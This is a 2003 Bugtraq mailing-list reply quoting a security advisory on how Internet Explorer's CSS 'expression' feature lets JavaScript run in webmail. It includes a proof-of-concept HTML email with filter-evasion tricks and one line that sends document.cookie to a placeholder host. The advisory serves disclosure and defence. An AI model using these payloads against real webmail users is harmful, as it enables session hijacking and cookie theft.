RE: Webmails + Internet Explorer can create unwanted javascript execution

From: Drew Copley (dcopley_at_eeye.com)
Date: 10/03/03

  • Next message: Conectiva Updates: "[CLA-2003:757] Conectiva Security Announcement - vixie-cron"
    To: "'Jedi/Sector One'" <j@pureftpd.org>, <bugtraq@securityfocus.com>
    Date: Fri, 3 Oct 2003 10:19:23 -0700
    
    

    Yahoo has a massive userbase (with good reason).

    This kind of bug could potentially turn some IE security issues into a more
    readily mail borne attack. This could be bad. Very bad.

    I do not see that you have contacted Yahoo on this.

    > -----Original Message-----
    > From: Jedi/Sector One [mailto:j@pureftpd.org]
    > Sent: Thursday, October 02, 2003 2:39 PM
    > To: bugtraq@securityfocus.com
    > Subject: Webmails + Internet Explorer can create unwanted
    > javascript execution
    >
    >
    >
    >
    > Summary : Multiple web-based mail systems browsed through
    > Internet Explorer
    > can allow arbitrary javascript execution.
    > Date : 02/10/2003
    > Author : Frank Denis <j@pureftpd.org>
    >
    >
    > ------------------------[ Description ]------------------------
    >
    > The issue described here doesn't reveal a vulnerability in
    > a specific product. But the combination of features of
    > Internet Explorer with features of common webmail software
    > can create a vulnerability.
    >
    > 1) Internet Explorer interprets stylesheets for any HTML tag,
    > even non-existent ones. For instance :
    >
    > <xbody style="...">
    >
    > is not a valid tag, but attributes are evaluated.
    >
    > It may be considered as a bug or as a logical behavior,
    > your mileage may vary. And this alone is not a security flaw.
    >
    > 2) Internet Explorer can evaluate Javascript expressions in
    > style sheets through the "expression" keyword :
    >
    > <style type="text/css">
    > a {
    > width: expression(6 * 9 + 'px');
    > }
    > </style>
    >
    > This is not a bug either, but a proprietary, properly
    > documented extension.
    >
    > 3) Due to the increase of HTML-only email, most popular
    > webmail software can display HTML email. In this context,
    > Javascript _must_ be removed from every email. To achieve
    > this result, various tricks are used by webmail software :
    >
    > - Removal or mangling of <script> tags,
    >
    > - Removal or mangling of "javascript:" urls.
    >
    > - Removal or mangling of properties like "onmouseover".
    >
    >
    > ------------------------[ Vulnerability
    > ]------------------------
    >
    > By combining 2) with 3) and if the webmail doesn't filter
    > out stylesheets nor the "expression" keyword, any Javascript
    > contained in a message will be executed as soon as the
    > recipient will display it.
    >
    > Some webmail software are aware of that issue for a while
    > and they are mangling or filtering any occurrence of
    > "expression". However, the mangling may not work when the
    > name of the property is escaped (like "e\xpression") as CSS
    > permits. Or it may not work in the context of
    > non-existent-because- mangled tags. The former worked on
    > Yahoo! until yesterday (the issue was fixed quickly after
    > being reported, they are nice and reactive guys).
    >
    > But most software simply don't know about "expression".
    > They are _not_ faulty, though. This is not a bug nor a
    > vulnerability. "expression" is a proprietary extension.
    > Webmails don't have to know about every possible implication
    > of every proprietary extension of every version of every
    > browser out there.
    >
    > However, when the following conditions are met, the
    > Javascript is executed :
    >
    > - "expression" keywords aren't filtered/mangled by the
    > webmail software.
    >
    > - The client software is Internet Explorer.
    >
    > - Javascript isn't disabled in the client software.
    > Unfortunately, a lot of public webmail systems simply don't
    > work when Javascript is disabled.
    >
    >
    > ------------------------[ Impact ]------------------------
    >
    > Depending on the webmail software, complete control of the
    > client's session may be possible. Private mail can be deleted
    > or bounced to evil addresses, cookies and session identifiers
    > can be stolen, etc.
    >
    >
    > ------------------------[ Proof of concept
    > ]------------------------
    >
    > Webmail software like to filter or mangle stylesheets. Some
    > software totally remove everything inside <head>...</head>
    > tags. Some software totally remove <body>...</body> tags
    > (possibly killing style info by the way) instead of
    > converting them to something like <div>...</div>. Some
    > software totally remove <style>...</style> definitions but
    > accept inline css.
    > This is bad, because it encourages people to send broken
    > HTML 3 code instead of well-formed, accessible XHTML documents.
    > The following HTML email tries to add workarounds for this
    > kind of filters in order to test whether the "expression"
    > keyword that properly gets evaluated on Internet Explorer. It
    > currently works at least with IE 6 + Squirrelmail, Yahoo! and
    > the software of a dozen public and ISP webmail services I
    > have an account on.
    >
    > <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
    > "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
    > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head>
    > <title>Webmail test</title>
    > <meta http-equiv="Content-Type"
    > content="text/html;charset=ISO-8859-1" /> </head> <body
    > style="width:&#x65;xpres\sion(alert(1))">
    > <style type="text/css">
    > h1 {
    > he\ight:&#x65;\xpression(alert(2));
    >
    > bac\kground-image:&#x65;\xpression('url(http://example.org/'+d
    > ocument.cookie+$
    > }
    > </style>
    > <h1 style="width:&#x65;xpression(alert(3))">...</h1>
    > <div id="just-for-fun">
    > <a href="&#x6A;avascript:window.open(document.location);"
    > onmouseover="alert(4)">fireworks</a>
    > </div>
    > </body>
    > </html>
    >
    >
    > ------------------------[ Fix ]------------------------
    >
    > For the end user, there are four ways to avoid this issue :
    >
    > - Don't use Internet Explorer to connect to webmails.
    > or/and
    > - Disable Javascript.
    > or/and
    > - Configure the webmail to only display mails as plain text. or/and
    > - Only connect to webmails when you are 100% sure the
    > software it is powered by completely filters or mangles
    > "expression" keywords and hope that software and the version
    > won't change silently.
    >
    >
    > --
    > __ /*- Frank DENIS (Jedi/Sector One)
    > <j@42-Networks.Com> -*\ __
    > \ '/ <a href="http://www.PureFTPd.Org/"> Secure FTP
    > Server </a> \' /
    > \/ <a href="http://www.Jedi.Claranet.Fr/"> Misc. free
    > software </a> \/
    >


  • Next message: Conectiva Updates: "[CLA-2003:757] Conectiva Security Announcement - vixie-cron"